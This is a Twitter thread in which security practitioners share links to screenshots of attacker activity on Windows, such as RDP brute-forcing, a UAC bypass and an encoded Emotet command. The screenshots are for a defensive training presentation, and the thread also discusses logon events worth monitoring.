|
@_noid_ | |||||
|
Blue Team peeps. I've got a favor to ask. Do you have any screenshots of adversary activity you could share with me? Redacted where necessary, of course. I'm trying to help a friend out with a presentation they're giving. The person who was supposed to help her is in the hospital
|
||||||
|
||||||
|
New year, new Fiendish Dr. Noid, API-T
@_noid_
|
2. velj |
|
She's going to be talking about what adversary activity looks like. I've got plenty of screenshots from the attackers perspective, but not much from the defenders side of things
|
||
|
|
||
|
New year, new Fiendish Dr. Noid, API-T
@_noid_
|
2. velj |
|
Windows perspective is ideal as most of her students are operating in that environment
|
||
|
|
||
|
Matthew Toussain
@0sm0s1z
|
2. velj |
|
Note the timestamps associated with the attempted login events.
Here we see a successful online password brute forcing attack against RDP. Closer inspection of the log data would reveal the successfully authenticated account and remote IP address. pic.twitter.com/zc3bXUgqBv
|
||
|
|
||
|
New year, new Fiendish Dr. Noid, API-T
@_noid_
|
2. velj |
|
Funny enough, I'm working on a list of logon event types to watch for. One of my usual indicators is attempts at Type 2 logon from service accounts or interactive logon from workstation to workstation. Outside of Help Desk/IT, I consider it anomalous behavior most places
|
||
|
|
||
|
Jarno Niemela
@jarnomn
|
3. velj |
|
Here is what a Windows 10 Fodhelper UAC bypass looks like.
The payload tries to launch multiple Meterpreter stagers and then when it succeeds, does UAC bypass. The data is from my test environment, since obviously can't share customer data pic.twitter.com/qXOOLCHnfO
|
||
|
|
||
|
New year, new Fiendish Dr. Noid, API-T
@_noid_
|
3. velj |
|
This would pair well with the screenshots I generated of PowerShell obfuscated payloads. Thanks
|
||
|
|
||
|
Digital
@0xDigital
|
2. velj |
|
Does emotet being executed on a users machine count? This has actually become an interview question (showing the PowerShell encoded command) to see how an analyst would figure out what's happening (basically asking that they understand they need to decode a base64 hash). pic.twitter.com/js6aXE5beD
|
||
|
|
||
|
New year, new Fiendish Dr. Noid, API-T
@_noid_
|
2. velj |
|
That's a good one. Funny enough I was just digging through some of my encoded payloads looking for a good "If you see this, shit's happening" example
|
||
|
|
||
|
Adam ♿ 🐧
@voltagex
|
3. velj |
|
Does a home user count? mobile.twitter.com/voltagex/statu…
|
||
|
|
||
|
Ryan
@ReversingWithMe
|
3. velj |
|
lockboxx.blogspot.com/2018/02/tamuct…
Random writeup from old CTF
Not my writeup, so can't grant permission if that's a factor
|
||
|
|
||